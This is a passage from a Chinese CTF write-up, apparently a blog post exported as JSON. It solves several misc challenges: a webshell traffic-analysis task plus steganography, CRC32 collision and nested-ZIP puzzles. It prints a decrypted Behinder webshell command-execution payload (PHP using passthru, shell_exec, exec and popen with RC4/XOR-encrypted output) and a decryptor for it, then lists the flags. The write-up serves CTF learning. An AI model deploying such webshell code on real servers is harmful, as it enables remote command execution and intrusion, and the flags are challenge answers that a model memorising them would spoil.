$Bvce('passthru', $PadtJn)) {\n        ob_start();\n        passthru($c);\n        $kWJW = ob_get_contents();\n        ob_end_clean();\n    } else if ($JueQDBH('shell_exec') and ! $Bvce('shell_exec', $PadtJn)) {\n        $kWJW = shell_exec($c);\n    } else if ($JueQDBH('exec') and ! $Bvce('exec', $PadtJn)) {\n        $kWJW = array();\n        exec($c, $kWJW);\n        $kWJW = join(chr(10), $kWJW) . chr(10);\n    } else if ($JueQDBH('exec') and ! $Bvce('popen', $PadtJn)) {\n        $fp = popen($c, 'r');\n        $kWJW = NULL;\n        if (is_resource($fp)) {\n            while (! feof($fp)) {\n                $kWJW .= fread($fp, 1024);\n            }\n        }\n        @pclose($fp);\n    } else {\n        $kWJW = 0;\n        $result[\"status\"] = base64_encode(\"fail\");\n        $result[\"msg\"] = base64_encode(\"none of proc_open\/passthru\/shell_exec\/exec\/exec is available\");\n        $key = $_SESSION['k'];\n        echo encrypt(json_encode($result));\n        return;\n    }\n    $result[\"status\"] = base64_encode(\"success\");\n    $result[\"msg\"] = base64_encode(getSafeStr($kWJW));\n    echo encrypt(json_encode($result));\n}\nfunction Encrypt($data)\n{\n    $key = \"e45e329feb5d925b\";\n    for($i = 0; $i < strlen($data); $i++) {\n        $data[$i] = $data[$i] ^ $key[$i+1&15];\n    }\n    $pwd_length = strlen($key);\n    $data_length = strlen($data);\n    $cipher = '';\n    $s = array();\n    for ($i = 0; $i < 256; $i++) {\n        $s[$i] = $i;\n    }\n    $j = 0;\n    for ($i = 0; $i < 256; $i++) {\n        $j = ($j + $s[$i] + ord($key[$i % $pwd_length])) % 256;\n        $tmp = $s[$i];\n        $s[$i] = $s[$j];\n        $s[$j] = $tmp;\n    }\n    $i = 0;\n    $j = 0;\n    for ($k = 0; $k < $data_length; $k++) {\n        $i = ($i + 1) % 256;\n        $j = ($j + $s[$i]) % 256;\n        $tmp = $s[$i];\n        $s[$i] = $s[$j];\n        $s[$j] = $tmp;\n        $cipher .= $data[$k] ^ chr($s[($s[$i] + $s[$j]) % 256]);\n    }\n    $bs = \"base64_\" . \"encode\";\n    $after = $bs($cipher);\n    return $after;\n}\n$cmd=\"Y2QgL2QgIkQ6XHBocHN0dWR5X3Byb1xXV1dcZGVmYXVsdFwiJmVjaG8gImZsYWd7N2JiYmUxM2YtNDU4Yi00NTFkLTlmZmEtMDkxMGJlYWU2YWI5fSI=\";$cmd=base64_decode($cmd);$path=\"RDovcGhwc3R1ZHlfcHJvL1dXVy9kZWZhdWx0Lw==\";$path=base64_decode($path);\nmain($cmd,$path);\n<\/code><\/pre>\n\n\n\n
\u6d419\u662f\u5f00\u59cb\u5411\u670d\u52a1\u5668\u8bf7\u6c42\u8f93\u51faflag\uff1a<\/p>\n\n\n\n
flag{7bbbe13f-458b-451d-9ffa-0910beae6ab9}<\/code><\/pre>\n\n\n\n
\u7279\u70b9\uff1a<\/p>\n\n\n\n
   \u653b\u51fb\u8005\u901a\u8fc7\u51b0\u874e Webshell \u63a7\u5236\u76ee\u6807\u670d\u52a1\u5668\n    \u5728 D:\\phpstudy_pro\\WWW\\default\\ \u76ee\u5f55\u4e0b\u627e\u5230 Flag\n    \u4f7f\u7528 echo \u547d\u4ee4\u8f93\u51fa Flag \u5185\u5bb9<\/code><\/pre>\n\n\n\n
\u8bf7\u6c42\u90e8\u5206\u89e3\u7801\u7a0b\u5e8f\uff1a<\/p>\n\n\n\n
#!\/usr\/bin\/env python3\n# \u89e3\u5bc6\u51b0\u874e\u8bf7\u6c42 - \u53ea\u89e3\u5bc6\u7b2c\u4e00\u5c42\nimport base64\nKEY = b\"e45e329feb5d925b\"\n\n# \u65b0\u7684\u8bf7\u6c42\u6570\u636e\ndata = \"\"\"\n\u6570\u636e\u586b\u5728\u8fd9\n\"\"\"\ndef rc4_decrypt(data: bytes, key: bytes) -> bytes:\n    \"\"\"RC4 \u89e3\u5bc6\"\"\"\n    pwd_length = len(key)\n    data_length = len(data)\n    s = list(range(256))\n    j = 0\n    for i in range(256):\n        j = (j + s[i] + key[i % pwd_length]) % 256\n        s[i], s[j] = s[j], s[i]\n    \n    i = j = 0\n    result = bytearray()\n    for k in range(data_length):\n        i = (i + 1) % 256\n        j = (j + s[i]) % 256\n        s[i], s[j] = s[j], s[i]\n        result.append(data[k] ^ s[(s[i] + s[j]) % 256])\n    return bytes(result)\n\ndef xor_decrypt(data: bytes, key: bytes) -> bytes:\n    \"\"\"XOR \u89e3\u5bc6\"\"\"\n    result = bytearray()\n    for i in range(len(data)):\n        key_index = (i + 1) % 16\n        result.append(data[i] ^ key[key_index])\n    return bytes(result)\n\nprint(\"=== \u89e3\u5bc6\u7b2c\u4e00\u5c42 ===\")\n\n# 1. Base64 \u89e3\u7801\nstep1 = base64.b64decode(data)\nprint(f\"1. Base64 \u89e3\u7801\u540e: {len(step1)} bytes\")\n\n# 2. RC4 \u89e3\u5bc6\nstep2 = rc4_decrypt(step1, KEY)\nprint(f\"2. RC4 \u89e3\u5bc6\u540e: {len(step2)} bytes\")\n\n# 3. XOR \u89e3\u5bc6\nstep3 = xor_decrypt(step2, KEY)\nprint(f\"3. XOR \u89e3\u5bc6\u540e: {len(step3)} bytes\")\n# \u8f93\u51fa\u7ed3\u679c\nresult = step3.decode('utf-8', errors='replace')\nprint(f\"\\n=== \u89e3\u5bc6\u7ed3\u679c ===\")\nprint(result)<\/code><\/pre>\n\n\n\n
AD ASTRA<\/h2>\n\n\n\n
\u7ed9\u4e868\u4e2a\u56fe\u7247\uff0c\u9690\u5199\u5927\u5408\u96c6<\/p>\n\n\n\n
1.gif\u5e27\u95f4\u9694\u9690\u5199\uff08\u53bb\u6389\u672b\u5c3e0\uff09<\/p>\n\n\n\n
72 65 80 80 89 78 69 65 82 50 48 50 54<\/code><\/pre>\n\n\n\n
10\u8fdb\u5236\u8f6c\u6362\uff1aHAPPYNEWYEAR2026<\/code><\/pre>\n\n\n\n
2.png\u76840\u901a\u9053LSB\u9690\u5199<\/p>\n\n\n\n
part1_b3YCvo9YcSIpc1l0<\/code><\/pre>\n\n\n\n
3.jpg\u6587\u4ef6\u5c3e\uff1a<\/p>\n\n\n\n
part2_JDhAooMzHrhN<\/code><\/pre>\n\n\n\n
4.png\u6587\u4ef6\u5c3e\uff1a<\/p>\n\n\n\n
part3_7xtMqjnejx2iYI+<\/code><\/pre>\n\n\n\n
5.png\u7528foremost\u63d0\u51fa\u6765\u4e00\u4e2a\u83ab\u540d\u5176\u5999\u56fe\u7247<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
6.jpg\u6587\u4ef6EXIF\u4fe1\u606f\u7684\u5230\uff1a<\/p>\n\n\n\n
part4_Usoq203Ry+<\/code><\/pre>\n\n\n\n
7.png\u4fee\u590d\u5bbd\u548c\u9ad8\uff1a<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
8.GIF\u5dee\u5206\u540e\u5f97\u5230<\/p>\n\n\n\n
part6:1ZaTQ==\ntYp7R<\/code><\/pre>\n\n\n\n
\u63a5\u4e0b\u6765\u662f\u7ec4\u88c5\u8fc7\u7a0b\uff08\u5185\u90e8\u53d8\u53161\u6b21\uff0c\u5916\u90e8\u53d8\u5316\u4e00\u6b21\uff09<\/p>\n\n\n\n
U2FsdGVkX19j9ML+b3YCvo9YcSIpc1lJDhAooMzHrhN7xtMqjnejx2iYI+Usoq203Ry+tYp7R1ZaTQ==<\/code><\/pre>\n\n\n\n
\u5bc6\u94a5\uff08\u5229\u7528hex\u8fdb\u5236\u6362\u4f4d\uff09\uff1a<\/p>\n\n\n\n
48415050594e45575945415232303236\uff08HAPPYNEWYEAR2026\uff09<\/code><\/pre>\n\n\n\n
Rc4Decrypt\uff1a<\/p>\n\n\n\n
flag{staNd1ng_0n_th3_ sh0uLd3rs_0f_g1ants}<\/code><\/pre>\n\n\n\n
\u77e5\u8bc6\u70b9\uff1a<\/p>\n\n\n\n
\u52a0\u76d0base\uff1a\u660e\u6587---\u300b\u52a0\u76d0\uff08\u968f\u673a\u82f1\u6587\u5b57\u6bcd\uff09---\u300bBase64\u52a0\u5bc6\n\u683c\u5f0f\uff1a\nSalted__<8\u5b57\u8282\u7684\u76d0\u503c><\u5b9e\u9645\u7684\u52a0\u5bc6\u5bc6\u6587>\n\u975e\u5bf9\u79f0\u52a0\u5bc6\uff0c\u89e3\u5bc6\u4e24\u4e2a\u65b9\u5411\uff1aRc4\u548crabbit<\/code><\/pre>\n\n\n\n
\u6211\u4e0d\u662f\u620f\u795e<\/h2>\n\n\n\n
\u5f97\u5230\u4e00\u4e2abmp\u6587\u4ef6\uff0c\u628a\u5c0f\u8bf4\u653e\u8fdb\u56fe\u7247\uff1a\uff08\u4e00\u79cd\u7c7b\u578b\u7684\u52a0\u5bc6\u65b9\u5f0f\uff1a\u5206\u522b\u63d0\u53d6RB\u901a\u9053\u9ad88\u4f4d\u548c\u4f4e8\u4f4d\uff09<\/p>\n\n\n\n
from PIL import Image\n \nimg = Image.open(\"\u6211\u4e0d\u662f\u620f\u795e.bmp\")\nwidth,height = img.size # 1326 1326\n \nres = \"\"\nfor y in range(height):\n    for x in range(width):\n        r,g,b = img.getpixel((x,y))\n        data = (r << 8) + b\n        res += chr(data)\nwith open(\"decode.txt\",\"w\") as f:\n    f.write(res)<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
txt\u91cc\u63d0\u53d6\u4e0d\u53ef\u89c1\u5b57\u7b26<\/p>\n\n\n\n
sdpcsec{ladies_and_gentlemen_its_showtime}<\/code><\/pre>\n\n\n\n
50\u91cd\u529b\u6545\u4e8b<\/h2>\n\n\n\n
\u77e5\u8bc6\u70b9\uff1a<\/p>\n\n\n\n
CRC32\u78b0\u649e\n\u6838\u5fc3\u539f\u7406\u662f\u5229\u7528CRC\u7b97\u6cd5\u7684\u6570\u5b66\u7279\u6027\u548c\u66b4\u529b\u679a\u4e3e\uff0c\u627e\u5230\u4e24\u4e2a\u4e0d\u540c\u7684\u6570\u636e\u5757\u4ea7\u751f\u76f8\u540c\u768432\u4f4d\u6821\u9a8c\u548c\u3002\u7531\u4e8eCRC32\u7684\u8f93\u51fa\u7a7a\u95f4\u6709\u9650\uff08\u4ec52^32\u79cd\u53ef\u80fd\uff09\uff0c\u53ea\u8981\u6570\u636e\u5757\u8db3\u591f\u77ed\uff0c\u5c31\u80fd\u5728\u6709\u9650\u65f6\u95f4\u5185\u627e\u5230\u78b0\u649e\u3002\n\t\nZIP\u683c\u5f0f\u5728\u6587\u4ef6\u5934\u4e2d\u5b58\u50a8\u4e86\u6bcf\u4e2a\u6587\u4ef6\u7684CRC32\u503c\u3002\u5982\u679c\u6587\u4ef6\u5185\u5bb9\u5f88\u5c0f\uff08\u59824\u5b57\u8282\uff09\uff0c\u53ef\u4ee5\u76f4\u63a5\u901a\u8fc7\u78b0\u649e\u8fd9\u4e2a\u503c\u8fd8\u539f\u51fa\u6587\u4ef6\u5185\u5bb9\u3002\n\n\u6ce8\u610f\uff1aCRC32\u78b0\u649e\u4ec5\u9002\u7528\u4e8e\u975e\u5e38\u5c0f\u7684\u6570\u636e\u5757\u3002\u5bf9\u4e8e\u8d85\u8fc76\u5b57\u8282\u7684\u6587\u4ef6\uff0c\u679a\u4e3e\u7a7a\u95f4\u8fc7\u5927\uff0c\u901a\u5e38\u9700\u8981\u5229\u7528\u7b97\u6cd5\u7684\u7ebf\u6027\u7279\u6027\u8fdb\u884c\u6570\u5b66\u6784\u9020\uff0c\u6216\u8005\u7ed3\u5408\u5176\u4ed6\u6f0f\u6d1e\uff08\u5982\u957f\u5ea6\u6269\u5c55\u653b\u51fb\uff09\u624d\u80fd\u5b9e\u73b0\u3002<\/code><\/pre>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u78b0\u649e\u5f97\u5230\uff1a<\/p>\n\n\n\n
\u90a3\u8fd9\u6b21\u7a81\u7136\u7684\u5f85\u5ba2\uff0c\u6b66\u9675\u8868\u73b0\u5f97\u600e\u4e48\u6837\uff1f<\/code><\/pre>\n\n\n\n
binwalk\u5f97\u5230\u4e00\u4e2a\u538b\u7f29\u5305\uff0ctxt\u5185\u6709\u4e0d\u53ef\u89c1\u96f6\u5bbd\u5b57\u7b26\u3002<\/p>\n\n\n\n
\u63a2\u7a76\u53d1\u73b0\u6587\u4ef6\u540d\u4e3a\u538b\u7f29\u5305\u5bc6\u7801\u7684\u5957\u8def<\/p>\n\n\n\n
\u9012\u5f52\u89e3\u538b\u5d4c\u5957\u52a0\u5bc6 ZIP \u6587\u4ef6\uff1a<\/strong>\uff08\u4e8eG3\u5e08\u5085\u53d6\u7ecf\uff09<\/p>\n\n\n\n
import pyzipper\nimport os\nimport shutil\n\nOUT_DIR = \"out\"#out\u6587\u4ef6\u5939\u4e0b\nos.makedirs(OUT_DIR, exist_ok=True)\n \n\n\ndef find_zip_in_out():\n#    \u5728 out \u76ee\u5f55\u4e2d\u627e\u4e00\u4e2a zip \u6587\u4ef6\n    for f in os.listdir(OUT_DIR):\n        if f.lower().endswith(\".zip\"):\n            return os.path.join(OUT_DIR, f)\n    return None\n \n\ndef unzip_with_filename_password(zip_path):\n    \"\"\"\n    \u4f7f\u7528 zip \u6587\u4ef6\u540d\uff08\u4e0d\u542b .zip\uff09\u4f5c\u4e3a\u5bc6\u7801\u89e3\u538b\n    \u6240\u6709\u5185\u5bb9\u89e3\u538b\u5230 out\/\n    \"\"\"\n    zip_name = os.path.basename(zip_path)\n    pwd_str = os.path.splitext(zip_name)[0]   # 098 \/ 099\n    pwd = pwd_str.encode()\n \n    try:\n        with pyzipper.AESZipFile(zip_path) as zf:\n            zf.pwd = pwd\n            zf.extractall(OUT_DIR)\n \n        print(f\"[+] \u89e3\u538b\u6210\u529f: {zip_name}  \u5bc6\u7801={pwd_str}\")\n        return True\n \n    except Exception as e:\n        print(f\"[!] \u89e3\u538b\u5931\u8d25: {zip_name}\")\n        print(f\"    \u539f\u56e0: {e}\")\n        return False\n\nstart_zip = \"100.zip\"\nstart_name = os.path.basename(start_zip)\nstart_in_out = os.path.join(OUT_DIR, start_name)\nshutil.copy2(start_zip, start_in_out)\n \nwhile True:\n    current_zip = find_zip_in_out()\n    if not current_zip:\n        print(\"[*] out \u4e2d\u6ca1\u6709 zip\uff0c\u7ed3\u675f\")\n        break\n\n    print(f\"\\n=== \u5904\u7406: {current_zip} ===\")\n    if not unzip_with_filename_password(current_zip):\n        print(\"[*] \u89e3\u538b\u5931\u8d25\uff0c\u505c\u6b62\")\n        break\n    # \u89e3\u5b8c\u540e\u5220\u9664 zip\uff0c\u9632\u6b62\u6b7b\u5faa\u73af\n    os.remove(current_zip)<\/code><\/pre>\n\n\n\n
\u5f97\u5230\u4e00\u4e2a file\u3002<\/p>\n\n\n\n
\u6839\u636e\u63d0\u793a\u662fVC\u5bb9\u5668\uff08\u53d6\u8bc1\u76f8\u5173\u77e5\u8bc6\uff09\uff0c\u524d\u9762\u6709\u4e00\u4e2a \u666f\u5b58\u4eba\u6773.txt \u8fd8\u672a\u4f7f\u7528\uff0c\u6839\u636e\u63d0\u793a\u5c06\u6587\u4ef6\u4f5c\u4e3a\u5bc6\u94a5\uff0c\u5f97\u5230flag.jpg<\/p>\n\n\n\n
\u6587\u4ef6\u683c\u5f0f\u662fTIFF\u6587\u4ef6\uff0c\u4fee\u6539\u540e\u5f97\u5230Flag<\/p>\n\n\n\n
flag{arknights_heavyfield}<\/code><\/pre>\n\n\n\n
Unsolved Mystery<\/h2>\n\n\n\n
\u96f6\u5bbd\u9690\u5199\u5f97\u5230<\/p>\n\n\n\n
camellia<\/code><\/pre>\n\n\n\n
\u5229\u7528\u8fd9\u4e2a\u5bf9file\u8fdb\u884c\u5f02\u6216\u64cd\u4f5c\u540e\u5f97\u5230PNG\uff1a<\/p>\n\n\n\n
\u53d1\u73b0Blue0\u901a\u9053\u6709\u9690\u5199\uff0c\u9ed1\u767d\u50cf\u7d20\u5757\u7684\u9690\u5199\uff08\u50cf\u7d20\u5757\u5927\u5c0f10x10\uff09<\/p>\n\n\n\n
\"\"<\/figure>\n\n\n\n
\u56fe\u7247\u5927\u5c0f\u4e3a70x330\uff0c\u610f\u5473\u7740\u6bcf\u884c\u521a\u597d\u67097\u4e2a\uff0c\u56e0\u6b64\u8fdb\u884c7bit\u7684\u8f6c\u5316\uff1a<\/p>\n\n\n\n
from PIL import Image\nimport numpy as np\n\ndef img_to_bits(path, block=10, thr=127):\n   img = Image.open(path).convert(\"L\")\n   arr = np.array(img)\n   bw, bh = img.size[0] \/\/ block, img.size[1] \/\/ block\n   \n   bits = []\n   for y in range(bh):\n       for x in range(bw):\n           bits.append('0' if arr[y*block:(y+1)*block, x*block:(x+1)*block].mean() > thr else '1')\n   \n   return ''.join(bits), bw\n\nbits, w = img_to_bits(\"solved1.bmp\")\n\n# \u6253\u5370\u56fe\u50cf\u5316\u9884\u89c8\nfor i in range(0, len(bits), w):\n   print(bits[i:i+w].replace('0', '\u2591').replace('1', '\u2588'))\n\n# 7\u4f4dASCII\u89e3\u7801\ntxt = ''.join(chr(int(bits[i:i+7], 2)) for i in range(0, len(bits)\/\/7*7, 7))\nprint(txt)<\/code><\/pre>\n\n\n\n
\u5f97\u5230\uff1a<\/p>\n\n\n\n
sdpcsec{YOu_be@t_it_successfully}<\/code><\/pre>\n\n\n\n
<\/p>\n","protected":false},"excerpt":{"rendered":"
\uff1f\uff1f\uff1fesab \u7ed9\u4e86\u4e2atxt\uff1a \u5173\u6ce8\u5230\u9644\u4ef6\u540d\u5b5746esab\uff0c\u8fd9\u662fBase64\u7684\u5012\u7740\u5199\uff0c\u6545\u800c\u8fd9\u4e2a\u9898\u7684\u7801\u8868\u4e5f\u662f\u5012\u7740\u7684 \u89e3\u51fa\u6765 CSGO …<\/p>\n","protected":false},"author":1,"featured_media":996,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"_gspb_post_css":"","emotion":"","emotion_color":"","title_style":"","license":"","footnotes":""},"categories":[9],"tags":[],"class_list":["post-886","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-misc"],"_links":{"self":[{"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts\/886","targetHints":{"allow":["GET"]}}],"collection":[{"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/comments?post=886"}],"version-history":[{"count":35,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts\/886\/revisions"}],"predecessor-version":[{"id":957,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/posts\/886\/revisions\/957"}],"wp:featuredmedia":[{"embeddable":true,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/media\/996"}],"wp:attachment":[{"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/media?parent=886"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/categories?post=886"},{"taxonomy":"post_tag","embeddable":true,"href":"http:\/\/shr1mp.top\/index.php\/wp-json\/wp\/v2\/tags?post=886"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}